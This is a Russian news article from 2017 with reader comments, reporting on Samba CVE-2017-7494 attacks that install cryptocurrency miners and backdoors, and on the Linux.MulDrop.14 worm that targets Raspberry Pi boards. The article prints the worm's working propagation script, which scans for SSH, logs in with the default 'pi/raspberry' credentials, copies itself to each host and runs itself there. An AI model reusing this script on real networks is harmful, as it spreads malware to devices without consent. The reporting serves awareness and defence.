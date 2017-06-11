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11.06.2017 11:04  Зафиксированы атаки для майнинга криптовалюты на уязвимых серверах Samba и на Raspberry Pi

Исследователи лаборатории Касперского зафиксировали активность злоумышленников, связанную с попытками захвата управления над Linux-серверами, на которых не устранена критическая уязвимость (CVE-2017-7494) в Samba, позволяющая выполнить код на сервере. В отличие от похожих целевых атак на Windows-системы с уязвимостью в стеке SMB, атака на Linux-системы сводится к установке не шифровальщика-вымогателя, а ПО для майнинга криптовалют (Trojan-Downloader.Linux.EternalMiner). При успешной атаки на сервере также устанавливается бэкдор для организации удалённого входа (Backdoor.Linux.Agent).

Уязвимость в Samba требует для своей эксплуатации возможности записи в раздел. Как правило разделы Samba экспортируются только для локальной сети, а наличие разделов Samba с доступом на запись, которые можно примонтировать из внешней сети без авторизации, само по себе уже является уязвимостью и встречается чрезвычайно редко. Отмеченная исследователями атака в основном актуальна как второй этап распространения влияния злоумышленников после первичного взлома клиентских систем в корпоративных локальных сетях. Например, первый этап взлома может осуществляться с использованием методов социальной инженерии через отправку троянского ПО сотрудникам по электронной почте. После запуска троянского ПО, осуществляется сканирование доступных в локальной сети серверных систем и поражения тех, что содержат неисправленных уязвимости.

Масштаб атаки пока не известен, удалось узнать только характеристики кошелька, на которые поступают полученные в результате майнинга средства. За месяц на кошелёк поступило 98 XMR (около 5.5 тысяч долларов).

Дополнительно можно отметить волну атак на платы Raspberry Pi, которые подключены к глобальной сети без смены устанавливаемого по умолчанию пароля (логин pi, пароль raspberry). Исследователи из компании Dr.Web выявили вредоносное ПО Linux.MulDrop.14, которое сканирует сетевые устройства с пользователем pi и типовыми паролями, задаваемыми по умолчанию, после чего устанавливает на них ПО ZMap, sshpass и компонент для майнинга криптовалют, меняет пароль для пользователя pi и запускает цикл сканирования устройств при помощи zmap с попытками входа по ssh и запуска своей копии: 


   NAME=`mktemp -u 'XXXXXXXX'`
 
   while [ true ]; do
       FILE=`mktemp`
       zmap -p 22 -o $FILE -n 100000
       killall ssh scp
       for IP in `cat $FILE`
       do
           sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME  && echo $IP >> /tmp/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
       done
       rm -rf $FILE
       sleep 10
   done


  1. Главная ссылка к новости (https://securelist.ru/30889/sa...)
  2. OpenNews: Уязвимость в Samba, позволяющая выполнить код на сервере
  3. OpenNews: Раскрыты детали уязвимости Badlock в Samba
  4. OpenNews: Обновление Samba 4.4.5, 4.3.11 и 4.2.14 с устранением уязвимости
  5. OpenNews: Уязвимость в Samba 4, которая может привести к удалённому выполнению кода
  6. OpenNews: Обновление Samba 4.6.1, 4.5.7 и 4.4.12 с устранением уязвимости
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: samba
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  • 1.1, Аноним, 11:17, 11/06/2017 [ответить] [смотреть все]     [к модератору]
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    Майнинг 2017 год Лично мне он перестал приносить доход в январе-июне 2013 года... весь текст скрыт [показать]
     
     
  • 2.2, Аноним, 11:24, 11/06/2017 [^] [ответить] [смотреть все]     [к модератору]  
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    А, так они XMR майнят Ну что ж, можно похвалить то, что им удалось собрать майн... весь текст скрыт [показать]
     
     
  • 3.4, commiethebeastie, 11:52, 11/06/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    Касперский опять забухал похоже.

    >Я тогда смогу выставить приоритеты для процесса

    Нет, он Large Page support включает.

     
  • 2.7, Аноним, 12:05, 11/06/2017 [^] [ответить] [смотреть все]     [к модератору]  
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    появляются все новые пирамидки Каждый раз есть время когда майнить выгодно Хот... весь текст скрыт [показать]
     
  • 1.3, commiethebeastie, 11:50, 11/06/2017 [ответить] [смотреть все]    [к модератору]  
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    о_О на чем они там майнят? Оно без AES-NI на 32 битной системе даёт 20 хешей на высокочастотном ядре core i3, на двух ядрах 32 хеша, потому что кеша не хватает и это при жесткой оптимизации SIMD.
     
     
  • 2.6, Аноним, 12:05, 11/06/2017 [^] [ответить] [смотреть все]     [к модератору]  
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    Ноутбук Core i5, есть AES-NI, в 2 потока 75 хешей, в 4 потока 50 хешей На дескт... весь текст скрыт [показать]
     
  • 1.5, Linux Mint, 12:04, 11/06/2017 [ответить] [смотреть все]    [к модератору]  
    		• +/
    "атака на Linux-системы сводится к установке ПО для майнинга криптовалют" - пароль администратора системы уже не нужен? Хотя уже и ответ имеется - "Исследователи лаборатории Касперского". Ждем Данилова, который научился делать САМОЗАПУСКАЮЩИЕСЯ вирусы под все системы..
     
     
  • 2.8, Аноним, 12:05, 11/06/2017 [^] [ответить] [смотреть все]     [к модератору]  
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    Уязвимость в Samba же Та самая, через которую недавно ломали Windows И ту, и т... весь текст скрыт [показать]
     

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